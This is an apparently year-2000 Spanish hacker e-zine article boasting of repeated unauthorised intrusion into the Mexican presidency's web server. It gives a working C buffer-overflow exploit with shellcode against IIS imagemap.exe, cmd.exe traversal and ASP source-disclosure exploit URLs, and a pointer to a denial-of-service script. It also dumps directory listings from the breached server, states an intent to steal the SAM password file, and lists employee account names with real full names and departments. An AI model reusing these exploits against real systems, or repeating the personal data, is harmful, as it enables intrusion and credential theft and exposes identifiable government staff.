=============================================================================--------------------------------------------------------------------------09------( Hackeando www.presidencia.gob.mx )------------------------------RM-11]-----[ alt3kx_H3z ]----------------------------[alt3kx_h3z@raza-mexicana.org]

-= HACKEANDO PRESIDENCIA.GOB.MX =- www.presidencia.gob.mx por alt3kx!

Comentarios alt3kx_h3z@raza-mexicana.org (c) 2000 alt3kx_h3z

Definitivamente, los grandes servidores como el ke vamos a cometar contiene diferentes vunerabilidades sobre todo es aspectos de configuracion bajo el IIS (Internet information server ) y tambien en aspectos en servicios como el SAMBA y FTP, definitivamente estamos hablando de WITENDO (Windows NT 4.0 server en este caso).

En este articulo trataremos de abarcar algunas vunearbilidades ke contiene o contenia este servidor llamado "www.presidencia.gob.mx", cabe mencionarque no mostrare los detallesa fondo, pues existen demasiados kiddies por ahi keriendo joder servidores y expresando mil y una idioteces, (ejemplo Cyberpunk y Machinfer) solo basta con visitar la pagina www.atrition.org pagina la cual se dedica a publicar las WEbcracks ke existen alrededordel mundo,

Empezare explicando algunas vuenerabilidades que por a~os se han encontrado vigentes en este servidor, (digo por a~os pues he entrado varias veces al servidor sin ser detectado), bien inicio un scan localizando vunerabilidades:

bash# ./a www.presidencia.gob.mx

HTTPd version for www.presidencia.gob.mx

HTTP/1.1 200 OKServer: Microsoft-IIS/4.0Content-Location: http://11.0.0.11/index.htmlDate: Thu, 09 Nov 2000 02:42:37 GMTContent-Type: text/htmlAccept-Ranges: bytes

Last-Modified: Thu, 09 Nov 2000 00:53:48 GMTETag: "0b6c284e749c01:217d"

Bien en esta parte estamos detectando ke el servidor cuenta con el servicio de IIS version 4.0 ke por ende, deducimos que tiene abierto el puerto 80 el cual podemos ejecutar comandos si el servidor lo deja, en modo perl, en este modo algunos servidores pueden ejecutar comandos y la moyoria de los bugs seencuentra en las funciones de open() y system() sobre todo en servidores NT en el campo sobre la funciones en scripts de CGI (Comun Gateway Interface).

En C, las funciones popen( ) y system( ) sirven para abrir un shell que procese los comandos que se le pasen como argumentos.

Por su parte, en Perl, ademas de las funciones anteriores, se dispone de open( ) con tuberia o entubado "|", exec( ) y eval( ), asi como de las comillas hacia atras "`". peke~o ejemplo:

exec("/usr/bin/ls","ls","/",0); <--podremos paginar la raiz si tenemos suerteen ekipos Linux o Unix.

>Para mayor referencia leer "HACk PCWeek"<

Bien el scan a localizado diferentes vunerabilidades bastante interesantes, las cuales nos podran dar accesso al este servidor :-) ...

(1)/_vti_bin/shtml.dll :(2)/_vti_bin/shtml.exe :

Estos dos servicios son proporcionados por FRONT PAGE en la mayoria de las versiones, el error (1) con suerte podremos llamar y paginar la raiz no en todos los casos funciona,para el error (2) existe un DoS (Denial Of Service)yo mismo he realizado el programa basado en perl para explotar esta vunerabilidad, basicamente existe un llamado en el puerto 80 con la cadena /_vti_bin/shtml.exe ejecutandoce remotamente en varias ocasiones causando asi ke el servidor no responda a la las peticiones y se colapse en tan solounos minutos. Una vez ejecutado este script al recargar "Refresh" la pagina en tu browser, no desplegara nada, "Ellos veran las pantalla Azul jeje "Screen Death".

El script ke hemos comentado se encuentran ne la siguientes webs con el siguiente nombre: fpage-DoS.pl

http://www.raza-mexicana.org http://www.hertmx.org

(3)/cgi-bin/imagemap.exe

Otro error en servicios de FRONT PAGE , este ejecutable hace referencia a las imagenes ke puedan estar hospedadas en la web, basicamente el imagemap.exese incluye en scripts bajo Java, Perl y algunos casos en php. En este error basicamente es un llamado para ejecutar comandos remotamente, con suerte podremos agregar un "dir" ejecutando la cadenasiguiente:

"/winnt/system32/cmd.exe?/c+dir"

Para este caso he logrado conseguir como se estructura el servidor:

http://www.presidencia.gob.mxFile C:\Inetpub\wwwroot\ The filename, directory name, or volume label syntax is incorrect

Ahora sabemos ke la web se encuentra en la unidad C:\ en el directorio wwwroot este directorio es el default de los servicios de IIS.

Aqui te proporciono el codigo fuente basado en c/c++ para ejecutar algunos comandos remotos donde hallas localizado el "imagemap.exe":

------------------------------------cortar-------------------------#include <stdio.h>#include <string.h>#include <windows.h>#include <winsock.h>

#define MAXBUF 2000#define RETADR 348#define JMPADR 344#define HTTP_PORT 80

unsigned int mems[]={0xBFB50000, 0xBFB72FFF, 0xBFDE0000, 0xBFDE5FFF,0xBFE00000, 0xBFE0FFFF, 0xBFE30000, 0xBFE42FFF,0xBFE80000, 0xBFE85FFF, 0xBFE90000, 0xBFE95FFF,0xBFEA0000, 0xBFF1EFFF, 0xBFF20000, 0xBFF46FFF,0xBFF50000, 0xBFF60FFF, 0xBFF70000, 0xBFFC5FFF,0xBFFC9000, 0xBFFE2FFF,0,0};

unsigned char exploit_code[200]={0xEB,0x32,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,0xBF,0xFF,0xD0,0x43,0x53,0x50,0x32,0xE4,0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x43,0x53,

0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6,0x90,0xEB,0xFD,0xE8,0xC9,0xFF,0xFF,0xFF,0x00};

unsigned char cmdbuf[200]="msvcrt.dll.system.welcome.exe";

unsigned int search_mem(unsigned char *st,unsigned char *ed, unsigned char c1,unsigned char c2){ unsigned char *p; unsigned int adr;

for (p=st;p<ed;p++) if (*p==c1 && *(p+1)==c2){ adr=(unsigned int)p; if ((adr&0xff)==0) continue; if (((adr>>8)&0xff)==0) continue; if (((adr>>16)&0xff)==0) continue; if (((adr>>24)&0xff)==0) continue; return(adr); } return(0);}

main(int argc,char *argv[]){ SOCKET sock; SOCKADDR_IN addr; WSADATA wsa; WORD wVersionRequested; unsigned int i,ip,p1,p2; static unsigned char buf[MAXBUF],packetbuf[MAXBUF+1000]; struct hostent *hs;

if (argc<2){ printf("usage: %s VictimHost\n",argv[0]); return -1; } wVersionRequested = MAKEWORD( 2, 0 ); if (WSAStartup(wVersionRequested , &wsa)!=0){ printf("Winsock Initialization failed.\n"); return -1; } if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){ printf("Can not create socket.\n"); return -1; } addr.sin_family = AF_INET; addr.sin_port = htons((u_short)HTTP_PORT); if ((addr.sin_addr.s_addr=inet_addr(argv[1]))==-1){ if ((hs=gethostbyname(argv[1]))==NULL){ printf("Can not resolve specified host.\n"); return -1; } addr.sin_family = hs->h_addrtype; memcpy((void *)&addr.sin_addr.s_addr,hs->h_addr,hs->h_length); } if (connect(sock,(LPSOCKADDR)&addr,sizeof(addr))==SOCKET_ERROR){ printf("Can not connect to specified host.\n"); return -1;

} memset(buf,0x90,MAXBUF); buf[MAXBUF]=0; for (i=0;;i+=2){ if (mems[i]==0) return FALSE; if ((ip=search_mem((unsigned char *)mems[i], (unsigned char *)mems[i+1],0xff,0xe3))!=0) break; } buf[RETADR ]=ip&0xff; buf[RETADR+1]=(ip>>8)&0xff; buf[RETADR+2]=(ip>>16)&0xff; buf[RETADR+3]=(ip>>24)&0xff; buf[JMPADR ]=0xeb; buf[JMPADR+1]=0x06;

strcat(exploit_code,cmdbuf); p1=(unsigned int)LoadLibrary; p2=(unsigned int)GetProcAddress; exploit_code[0x0d]=p1&0xff; exploit_code[0x0e]=(p1>>8)&0xff; exploit_code[0x0f]=(p1>>16)&0xff; exploit_code[0x10]=(p1>>24)&0xff; exploit_code[0x1e]=p2&0xff; exploit_code[0x1f]=(p2>>8)&0xff; exploit_code[0x20]=(p2>>16)&0xff; exploit_code[0x21]=(p2>>24)&0xff;

memcpy(buf+RETADR+4,exploit_code,strlen(exploit_code)); sprintf(packetbuf,"GET /cgi-bin/imagemap.exe?%s\r\n\r\n",buf); send(sock,packetbuf,strlen(packetbuf),0); closesocket(sock); printf("Done.\n"); return FALSE;}

------------------------------------cortar-------------------------

Los componentes afectados son HTIMAGE.EXE e IMAGEMAP.EXE, ke se ocupan de soportar el "image mapping" o "mapeado de imagenes" desde servidores compatibles con CERN y NCSA, respectivamente. A nivel practico, "imagemapping" integra los hiperenlaces dentro de las imagenes y permite crear enlaces en determinadas areas de un grafico. Un ejemplo tipico podria ser el de un mapa grafico en el ke, al seleccionar uno de los estados delimitados, nos traslada a otra pagina con informacion sobre la region escogida.

La vulnerabilidad a la ke hoy nos referimos consiste en el conocido ataque por desbordamiento de bufer. En concreto, un excesivo tama~o en los argumentos que se les pasa como parametros a estos componentes, puede provocar el acceso no controlado a la memoria del sistema. Una vez quese produce el desbordamiento de bufer, los datos sobrantes que acceden de forma descontrolada a la memoria pueden bloquear el sistema si no pueden interpretarse como comandos o ejecutarse las instrucciones que representan.

Una solucion ke propone Microsoft (muy peke~a) es la eliminacion de estos archivos,mediante una buskeda sencilla como dar "Buscar"-- "Archivos y carpetas" con los nombres de imagemap.exe y htimage.exe .

La perdida de estos archivos afectar solo a la funcionalidad cuando se utilicen hiperenlaces graficos tipo CERN O NCSA y el cliente mantenga un navegador muy antiguo, lo ke es muy poco probable.

(4)/Default.asp

Error en scripts de ASP (Active Server Page), los ASP basicamente se usan en formularios y servicios para base de datos, en los personal los he manejado poko, pues ya no he programado sobre ASP, pero podemos entender ke se hospedan en los servicios del IIS por default,con ASP podremos lograr demasiadas cosas, lo importante de los ASP es lograr ver el codigo fuente para asi insertar cadenas.

Hablando un poco sobre el error (4), existe la manera de tener acceso a los archivos del sistema remotamente, el trabajo consiste en localizar los directorios posibles para ejecucion, el problema es causado por el IIS, que no verifica la autentificacion sobre los camandos transcritos sobre el servicio, el error es basicamente agregar comandos para obtener respuesta del servidor ejemplo:

http://www.presidencia.gob.mx/default.asp%20.pl

IIS recibe esta respuesta y asume ke es para un perl script, perl cuando recive la instruccion para ejecutar default.asp, deja pasarla como una instruccion con extension.pl, con esto podremos enga~ar al servidor para ejecutar algunos otros comandos ejemplo:

http://www.presidencia.gob.mx/passwd.txt%20.pl

Si tenemos suerte podremos obtener un error como este:

C:\Inetpub\scripts\passwd.txt line 1

Algunos ejemplos en ASP:

[Codebrws.asp]: Originalmente localizado en la siguiente ruta:/iissamples/exair/howitworks/codebrws.asp?Exploit:SERVER/iissamples/exair/howitworks/codebrws.asp?source=/msadc/Samples/../../../../../ARCHIVO

[Showcode.asp]: Originalmente localziado en la siguiente ruta:

/msadc/samples/selector/showcode.aspExploit:SERVER/msadc/samples/selector/showcode.asp?source=/msadc/Samples/../../../../../ARCHIVO

Codigo fuente del ASP (showcode.asp)--------------------------------------------------------------------------------<SCRIPT LANGUAGE=VBScript RUNAT=Server>

REM *************** NOTICE **************** REM * This file may only be used to view * REM * source code of .asp files in the * REM * AdvWorks or ASP Sample directory. * REM * If you wish to change the security * REM * on this, modify or remove this * REM * function. * REM ***************************************

FUNCTION fValidPath (ByVal strPath) If InStr(1, strPath, "/Msadc/", 1) Then fValidPath = 1 Else fValidPath = 0 End If END FUNCTION</SCRIPT>

<SCRIPT LANGUAGE=VBScript RUNAT=Server> REM Returns the minimum number greater than 0 REM If both are 0, returns -1 FUNCTION fMin (iNum1, iNum2) If iNum1 = 0 AND iNum2 = 0 Then fMin = -1 ElseIf iNum2 = 0 Then fMin = iNum1 ElseIf iNum1 = 0 Then fMin = iNum2 ElseIf iNum1 < iNum2 Then fMin = iNum1 Else fMin = iNum2 End If END FUNCTION</SCRIPT>

<SCRIPT LANGUAGE=VBScript RUNAT=Server> FUNCTION fCheckLine (ByVal strLine)

fCheckLine = 0 iTemp = 0

iPos = InStr(strLine, "<" & "%") If fMin(iTemp, iPos) = iPos Then iTemp = iPos fCheckLine = 1

End If

iPos = InStr(strLine, "%" & ">") If fMin(iTemp, iPos) = iPos Then iTemp = iPos fCheckLine = 2 End If

iPos = InStr(1, strLine, "<" & "SCRIPT", 1) If fMin(iTemp, iPos) = iPos Then iTemp = iPos fCheckLine = 3 End If

iPos = InStr(1, strLine, "<" & "/SCRIPT", 1) If fMin(iTemp, iPos) = iPos Then iTemp = iPos fCheckLine = 4 End If

END FUNCTION</SCRIPT>

<SCRIPT LANGUAGE=VBScript RUNAT=Server>SUB PrintHTML (ByVal strLine) iSpaces = Len(strLine) - Len(LTrim(strLine)) i = 1 While Mid(Strline, i, 1) = Chr(9) iSpaces = iSpaces + 5 i = i + 1 Wend If iSpaces > 0 Then For i = 1 to iSpaces Response.Write(" ") Next End If iPos = InStr(strLine, "<") If iPos Then Response.Write(Left(strLine, iPos - 1)) Response.Write("<") strLine = Right(strLine, Len(strLine) - iPos) Call PrintHTML(strLine) Else Response.Write(strLine) End If END SUB</SCRIPT>

<SCRIPT LANGUAGE=VBScript RUNAT=Server> SUB PrintLine (ByVal strLine, iFlag) Select Case iFlag Case 0 Call PrintHTML(strLine) Case 1 iPos = InStr(strLine, "<" & "%") Call PrintHTML(Left(strLine, iPos - 1)) Response.Write("<FONT COLOR=#ff0000>")

Response.Write("<%") strLine = Right(strLine, Len(strLine) - (iPos + 1)) Call PrintLine(strLine, fCheckLine(strLine)) Case 2 iPos = InStr(strLine, "%" & ">") Call PrintHTML(Left(strLine, iPos -1)) Response.Write("%>") Response.Write("</FONT>") strLine = Right(strLine, Len(strLine) - (iPos + 1)) Call PrintLine(strLine, fCheckLine(strLine)) Case 3 iPos = InStr(1, strLine, "<" & "SCRIPT", 1) Call PrintHTML(Left(strLine, iPos - 1)) Response.Write("<FONT COLOR=#0000ff>") Response.Write("<SCRIPT") strLine = Right(strLine, Len(strLine) - (iPos + 6)) Call PrintLine(strLine, fCheckLine(strLine)) Case 4 iPos = InStr(1, strLine, "<" & "/SCRIPT>", 1) Call PrintHTML(Left(strLine, iPos - 1)) Response.Write("</SCRIPT>") Response.Write("</FONT>") strLine = Right(strLine, Len(strLine) - (iPos + 8)) Call PrintLine(strLine, fCheckLine(strLine)) Case Else Response.Write("FUNCTION ERROR -- PLEASE CONTACT ADMIN.") End Select END SUB</SCRIPT>

<% strVirtualPath = Request("source") %>

<HTML><HEAD><TITLE>View Active Server Page Source</TITLE></HEAD><BODY BGCOLOR=#FFFFFF><FONT FACE="Verdana, Arial, Helvetica" SIZE=6><TABLE><TR><TD><IMG SRC="/Msadc/Samples/Selector/asp.gif"WIDTH=200 HEIGHT=93 BORDER=0 ALT="Active Server Page logo"></TD><TD><FONT FACE="Verdana, Arial, Helvetica" SIZE=6>View ASP Source</FONT></TD></TR></TABLE><FONT FACE="Verdana, Arial, Helvetica" SIZE=2>Go Back to <a href="<%=strVirtualPath%>"><%=strVirtualPath%></A><BR><hr><%If fValidPath(strVirtualPath) Then strFilename = Server.MapPath(strVirtualPath) Set FileObject = Server.CreateObject("Scripting.FileSystemObject") Set oInStream = FileObject.OpenTextFile (strFilename, 1, FALSE ) While NOT oInStream.AtEndOfStream strOutput = oInStream.ReadLine Call PrintLine(strOutput, fCheckLine(strOutput)) Response.Write("<BR>")

Wend Else Response.Write("<H1>View Active Server Page Source-- Access Denied</H1>") End If%>

</BODY></HTML>

>Lectura recomendada ASP PROGRAMING MS<

(5)/msadc/msadcs.dll

Se ha comentado mucho sobre este error en varias ocasiones por lo cual solo hare referencia al articulo ke realizo _0x90_ en la e-zine de raza-mexicana en el raza#10, Te pongo la direccion exacta para ke puedas leer este buen articulo:

http://www.raza-mexicana.org/revista/html/raza10-2.html#iisrds

He puesto las vunerabilidades mas conocidas he importantes sobre este servidor, a partir de este momento posteare algunos archivos ke se encuentran en los directorios mas importantes bajo el el servidor NT 4.0 con servicio IIS 4.0 del servidor www.presidencia.gob.mx.

Tecleando C:\dir C:\Inetpub\scriptsse localiza lo siguiente:

Directory of C:\Inetpub\scripts10/28/00 07:31p <DIR> .10/28/00 07:31p <DIR> ..04/07/99 08:57p <DIR> buscar 4 File(s) 208,144 bytes 579,322,880 bytes free

Tecleando C:\dir C:\Inetpubse localiza lo siguiente:

Directory of c:\Inetpub

10/05/00 11:48p <DIR> .10/05/00 11:48p <DIR> ..10/27/00 01:12p <DIR> catesp08/31/00 12:53p <DIR> catexp10/27/00 01:13p <DIR> cating04/07/99 10:40p <DIR> catkids12/24/99 12:01p <DIR> iissamples06/03/99 01:31p <DIR> Repaldos10/28/00 07:31p <DIR> scripts10/24/00 09:03a <DIR> wwwroot 10 File(s) 0 bytes 579,322,880 bytes free

Kiero ver ke hay desde raiz :-)

Tecleando C:\dir C:\se localiza lo siguiente:

Directory of c:\10/16/00 08:02p <DIR> Almacen03/31/99 05:00a 0 AUTOEXEC.BAT03/31/99 05:00a 0 CONFIG.SYS09/03/00 03:41p <DIR> especial09/02/00 08:14p 372 FRONTPG.LOG10/05/00 11:48p <DIR> Inetpub04/07/99 09:12p <DIR> List10/24/00 06:36p 67,108,864 pagefile.sys04/05/99 11:42a <DIR> php308/31/00 08:36p <DIR> Program Files07/19/99 12:03p <DIR> ssinst04/05/00 10:17a <DIR> StatisticsServer10/28/00 10:23a <DIR> TEMP10/28/00 07:38p <DIR> WINNT10/28/00 10:25a 469,869 winzip.log 15 File(s) 67,579,105 bytes 579,322,880 bytes free

Tecleando C:\dir C:\WINNTse localiza lo siguiente:

Directory of c:\WINNT10/28/00 07:38p <DIR> .10/28/00 07:38p <DIR> ..02/17/98 10:51a 20,480 aceclcab.exe02/17/98 10:53a 690,534 aceclnt.cab08/31/00 08:30p 6,305 Active Setup Log.BAK08/31/00 08:38p 10,018 Active Setup Log.txt08/31/00 08:30p 0 AdvpackExt.BAK08/31/00 08:36p 0 AdvpackExt.log03/29/99 01:16p 21,590 Bind List Log.txt10/13/96 07:38p 5,328 black16.scr03/29/99 01:15p <DIR> CatRoot05/08/98 12:00a 84,032 Channel Screen Saver.SCR10/13/96 07:38p 82,944 clock.avi12/29/98 11:54p 49,424 clspack.exe12/24/99 12:01p <DIR> cm3203/31/99 04:49a <DIR> Config03/31/99 05:00a 0 control.ini03/29/99 01:14p <DIR> COOKIES08/31/00 08:37p <DIR> Cursors09/11/00 07:24p 1,576,127 drwtsn32.log11/18/99 11:04a 237,328 EXPLORER.EXE05/08/98 12:00a 103,424 EXTRAC32.EXE08/31/00 08:37p 100,864 extract.exe03/29/99 01:28p 276 frontpg.ini04/08/00 10:05a <DIR> Help08/31/00 08:37p 26,896 hh.exe03/29/99 01:14p <DIR> History03/29/99 01:15p 128,985 IE4 Setup Log.Txt11/18/99 11:04a 150,898 IEHELP.EXE08/31/00 08:37p 17,655 iextract.exe12/29/98 11:07p 6,550 jautoexp.dat

05/18/98 12:00a 14,017 JAUTOEXP.INI03/29/99 01:20p <DIR> Java07/04/99 10:55a 1,729 javainst.log12/29/98 11:51p 169,232 jview.exe10/13/96 07:38p 157,044 lanma256.bmp10/13/96 07:38p 157,044 lanmannt.bmp07/04/99 11:52a 2,670 MDACSET.log10/19/00 01:27p 185 mdm.ini04/08/00 10:05a <DIR> Media10/27/00 09:47p 165 mmc.INI05/28/99 11:25a <DIR> Mon07/05/99 02:31p <DIR> msapps11/03/97 04:48p 1,405 MSDFMAP.INI03/29/99 01:31p 16,384 MSIMGSIZ.DAT12/19/96 12:00a 49,094 MSO97.ACL10/13/96 07:38p 67,328 network.wri10/13/96 07:38p 45,328 NOTEPAD.EXE10/24/00 06:27p 2,304 ODBC.INI08/31/00 08:52p 5,702 ODBCINST.INI08/15/98 01:53p 2,780 php3.ini11/18/99 11:04a 123,152 POLEDIT.EXE10/13/96 07:38p 34,816 printer.wri03/29/99 11:04a <DIR> Profiles08/30/99 03:43a <DIR> Proyectos10/13/96 07:38p 71,952 REGEDIT.EXE07/23/98 02:18p 40,960 REGTLIB.EXE04/06/99 12:01p <DIR> repair03/29/99 01:20p 20,034 RunOnceEx Log.txt03/29/99 01:22p <DIR> Samples09/11/99 05:17p 1,004 scsE0.tmp12/29/98 11:53p 46,352 setdebug.exe04/08/00 10:05a 308 setup.old08/31/00 04:33p 286,720 Setup1.exe03/29/99 11:01a 138 setuplog.txt03/29/99 01:16p 956 Soft Boot Log.txt08/31/00 04:33p 73,216 ST6UNST.EXE03/29/99 01:20p <DIR> Subscriptions08/31/00 08:30p <DIR> system10/13/96 07:38p 219 system.ini10/24/00 06:36p <DIR> system3210/13/96 07:38p 32,016 TASKMAN.EXE03/29/99 01:20p <DIR> Temporary Internet Files09/11/00 07:25p 110,539,070 user.dmp07/04/99 11:08a 1,245 VB.INI10/24/00 06:39p 62 VBAddin.INI08/31/00 08:54p <DIR> VBE07/04/99 11:42a 2,659 vminst.log10/13/96 07:38p 24,336 vmmreg32.dll03/29/99 01:16p <DIR> Web10/13/96 07:38p 22,288 welcome.exe10/28/00 10:29a 423 WIN.INI10/13/96 07:38p 3 WINFILE.INI10/13/96 07:38p 256,192 WINHELP.EXE11/18/99 11:04a 311,056 WINHLP32.EXE12/29/98 11:52p 162,576 wjview.exe07/04/99 11:08a 0 wplog.txt10/13/96 07:38p 707 _DEFAULT.PIF

07/03/00 11:36a 0 ~DF1026.tmp07/14/99 11:52a 0 ~DF11A2.tmp01/01/00 12:03a 0 ~DF17A.tmp09/02/00 08:00p 0 ~DF1BED.tmp09/03/00 01:36p 0 ~DF30.tmp09/02/00 08:12p 0 ~DF315D.tmp11/14/99 04:56p 0 ~DF3DEB.tmp06/08/00 03:47p 0 ~DF42C4.tmp03/29/99 07:08p 0 ~DF5F3F.tmp09/02/00 08:22p 0 ~DF61F7.tmp04/06/99 09:49a 0 ~DF63C8.tmp09/02/00 08:22p 0 ~DF654A.tmp09/04/00 11:28a 0 ~DF731F.tmp04/06/99 10:19a 0 ~DF7382.tmp04/06/99 11:04a 0 ~DF8C6D.tmp10/24/00 06:17p 0 ~DFA8E.tmp03/29/99 01:30p 0 ~DFB853.tmp10/06/00 11:53a 0 ~DFBA7A.tmp05/11/99 01:35p 0 ~DFBD0F.tmp04/07/99 07:51p 0 ~DFBF40.tmp05/07/99 10:08a 0 ~DFC2ED.tmp11/25/99 03:19p 0 ~DFCC29.tmp09/04/00 05:30p 0 ~DFD410.tmp02/23/00 11:23p 0 ~DFD6A5.tmp04/05/99 09:25a 0 ~DFD73.tmp12/06/99 07:01p 0 ~DFD849.tmp07/14/99 11:00a 0 ~DFDB4C.tmp10/06/99 06:50p 0 ~DFDC15.tmp05/11/99 01:40p 0 ~DFDDB9.tmp07/20/99 11:33a 0 ~DFDF72.tmp09/17/00 04:00p 0 ~DFE17B.tmp06/08/99 01:32p 0 ~DFE24D.tmp05/12/99 08:51a 0 ~DFE2D9.tmp06/25/00 07:24p 0 ~DFE379.tmp07/04/99 11:46a 0 ~DFE56E.tmp05/26/99 07:08p 0 ~DFE5DC.tmp06/08/99 11:10p 0 ~DFE65E.tmp05/11/99 12:25p 0 ~DFE668.tmp03/08/00 08:20p 0 ~DFE6A4.tmp08/10/00 08:18p 0 ~DFE6FF.tmp05/07/99 09:53p 0 ~DFE709.tmp05/04/99 08:49p 0 ~DFE795.tmp06/17/99 10:34a 0 ~DFE817.tmp05/07/99 09:18a 0 ~DFE821.tmp09/25/00 10:38a 0 ~DFE83F.tmp04/10/99 01:13p 0 ~DFE989.tmp08/31/00 05:14p 0 ~DFEA3E.tmp07/04/99 10:59a 0 ~DFEAB6.tmp07/04/99 11:55a 0 ~DFEAFC.tmp08/25/99 08:23p 0 ~DFEBCE.tmp11/14/99 03:39p 0 ~DFEBF6.tmp03/01/00 09:35p 0 ~DFED23.tmp10/05/99 07:30p 0 ~DFEDF5.tmp07/04/99 11:12a 0 ~DFEE1D.tmp04/08/99 12:01a 0 ~DFEE3B.tmp04/14/99 10:03p 0 ~DFEF22.tmp04/22/99 11:22a 0 ~DFEF5E.tmp

08/26/99 08:27p 0 ~DFEF5F.tmp08/31/99 12:49a 0 ~DFEFC2.tmp08/03/99 07:26p 0 ~DFEFE0.tmp04/10/99 01:09p 0 ~DFEFF4.tmp07/21/99 11:19p 0 ~DFF207.tmp12/30/99 11:11p 0 ~DFF473.tmp03/29/99 06:54p 0 ~DFF528.tmp03/04/00 12:43a 0 ~DFF55A.tmp03/03/00 10:46p 0 ~DFF5DC.tmp11/22/99 04:46p 0 ~DFF5FA.tmp03/29/99 07:00p 0 ~DFF781.tmp08/31/00 02:26p 0 ~DFF79F.tmp08/31/00 02:40p 0 ~DFF7F9.tmp10/24/00 06:36p 0 ~DFF867.tmp08/31/00 10:42p 0 ~DFF92F.tmp04/07/99 11:49p 0 ~DFF94D.tmp08/31/00 07:49p 0 ~DFF9C5.tmp09/04/00 11:41a 0 ~DFF9D9.tmp08/30/00 06:20p 0 ~DFF9EE.tmp09/04/00 05:36p 0 ~DFFA5C.tmp08/24/00 12:32a 0 ~DFFA7A.tmp02/18/00 04:21p 0 ~DFFAB6.tmp08/31/00 04:58p 0 ~DFFB60.tmp04/06/00 07:16p 0 ~DFFB7E.tmp03/02/00 08:39p 0 ~DFFBD8.tmp09/12/00 07:26p 0 ~DFFBD9.tmp12/24/99 01:07p 0 ~DFFBE2.tmp10/21/00 10:02a 0 ~DFFC14.tmp08/31/00 08:45p 0 ~DFFC1E.tmp08/31/00 12:46p 0 ~DFFC3C.tmp09/11/00 07:43p 0 ~DFFC6E.tmp09/18/00 05:36p 0 ~DFFC6F.tmp01/25/00 03:27p 0 ~DFFC82.tmp08/28/00 09:56a 0 ~DFFCBF.tmp03/03/00 10:20p 0 ~DFFCE7.tmp09/04/00 01:41p 0 ~DFFD2D.tmp03/04/00 12:31a 0 ~DFFD55.tmp08/03/99 10:02p 0 ~DFFDAF.tmp01/14/00 10:03a 0 ~DFFDB9.tmp10/07/00 10:58a 0 ~DFFDBA.tmp09/15/00 12:29p 0 ~DFFDC3.tmp04/07/99 09:21p 0 ~DFFDEB.tmp05/05/00 09:57a 0 ~DFFE1D.tmp04/05/99 09:39a 0 ~DFFE81.tmp09/04/00 06:32p 0 ~DFFEBD.tmp10/05/00 09:58a 0 ~DFFF53.tmp07/05/00 10:27p <DIR> ~offfilt09/02/00 08:22p 42,496 ~WRC0000.tmp09/02/00 08:01p 1,536 ~WRF0000.tmp 194 File(s) 116,108,561 bytes 579,322,880 bytes free

Robemos el sam._ :-)

Tecleando C:\dir C:\WINNT\repairse localiza lo siguiente:

c:\winnt\repair01/01/00 04:24a <DIR> .01/01/00 04:24a <DIR> ..10/14/96 03:38a 438 autoexec.nt01/01/00 04:29a 2,510 config.nt01/01/00 04:31a 15,508 default._01/01/00 04:31a 14,768 ntuser.da_01/01/00 04:31a 3,511 sam._01/01/00 04:31a 6,393 security._01/01/00 04:31a 131,946 software._01/01/00 04:31a 85,390 system._ 10 File(s) 260,464 bytes

Tecleando C:\dir C:\Inetpub\scripts\buscarse localiza lo siguiente:

Directory of c:\Inetpub\scripts\buscar

04/07/99 08:57p <DIR> .04/07/99 08:57p <DIR> ..09/17/98 07:28p 2,668 basica.htm05/22/98 09:44p 10,150 basica.htx09/26/98 12:23a 518 basica.idq09/17/98 07:32p 2,668 basica1.htm07/03/98 12:09p 10,181 Basicaex.htx09/26/98 12:23a 522 Basicaex.idq09/17/98 07:38p 1,504 basicaResp.htm09/17/98 07:38p 1,504 Copia de basicafuera.htm09/17/98 07:28p 2,005 query.htm04/06/99 10:04a <DIR> _vti_cnf 12 File(s) 31,720 bytes 579,322,880 bytes free

Kiero ver ke hay en el Program Files :-)

Tecleando C:\dir C:\progra~1se localiza lo siguiente:

Directory of c:\progra~1

08/31/00 08:36p <DIR> .08/31/00 08:36p <DIR> ..07/04/99 11:05a <DIR> Common Files10/24/00 04:46p <DIR> Explora12/24/99 12:00p <DIR> MarkVis03/29/99 01:28p <DIR> Microsoft FrontPage08/31/00 08:33p <DIR> Microsoft Office03/29/99 01:26p <DIR> Microsoft Script Debugger07/04/99 11:07a <DIR> Microsoft Visual Studio12/24/99 12:02p <DIR> Mts03/11/00 01:28p <DIR> NT OBJECTives, Inc08/31/00 08:33p <DIR> Office200003/29/99 11:01a <DIR> Plus!07/12/99 02:43p <DIR> Respaldos07/04/99 11:07a <DIR> Web Publish03/14/00 11:23a <DIR> WEBTREND

04/08/00 10:05a <DIR> Windows NT09/06/99 10:53a <DIR> WinZip 18 File(s) 0 bytes 579,257,344 bytes free

K00l tienen Office2000, Front Page, y Winzip :X

Kiero saber ke hay en Microsoft FrontPage

Tecleando C:\dir C:\progra~1\micros~1se localiza lo siguiente:

Directory of c:\progra~1\micros~1

03/29/99 01:28p <DIR> .03/29/99 01:28p <DIR> ..03/29/99 01:28p 551 FrontPage Server Administrator.lnk03/29/99 01:28p <DIR> temp03/29/99 01:28p <DIR> version3.0 5 File(s) 551 bytes 579,191,808 bytes free

Kiero saber ke hay dentro de version3.0

Tecleando C:\dir C:\progra~1\micros~1\version3.0se localiza lo siguiente:

Directory of c:\progra~1\micros~1\version3.003/29/99 01:28p <DIR> .03/29/99 01:28p <DIR> ..03/29/99 01:26p <DIR> admin03/29/99 01:26p <DIR> bin03/29/99 01:26p <DIR> isapi03/29/99 01:26p <DIR> serk03/28/00 08:58p <DIR> servsupp03/29/99 01:28p <DIR> temp03/29/99 01:28p <DIR> _vti_bin 9 File(s) 0 bytes 579,191,808 bytes free

-------------------------------------------------------------Algunos Mails/Usuarios sobre el dominio presidencia.gob.mx

-------------------------------------------------------------

Account Name :abc@presidencia.gob.mx

The abc account is a normal USER, and the password waschanged 0 days ago. This account has been used 0 times to logon.

Comment :Secretaria PrivadaUser Comment :

Full name :anonimo

Account Name :abrun@presidencia.gob.mx

The abrun account is a normal USER, and the password waschanged 0 days ago. This account has been used 0 times to logon.

Comment :Consejeria JuridicaUser Comment :Full name :Ana Brun I~arritu

Account Name :acast@presidencia.gob.mx

The acast account is a normal USER, and the password waschanged 0 days ago. This account has been used 4 times to logon.

Comment :Prospectiva y Proyectos EspecialesUser Comment :Full name :Akram Daniel Castillo Cardenas

Account Name :acontla@presidencia.gob.mx

The acontla account is a normal USER, and the password waschanged 0 days ago. This account has been used 0 times to logon.

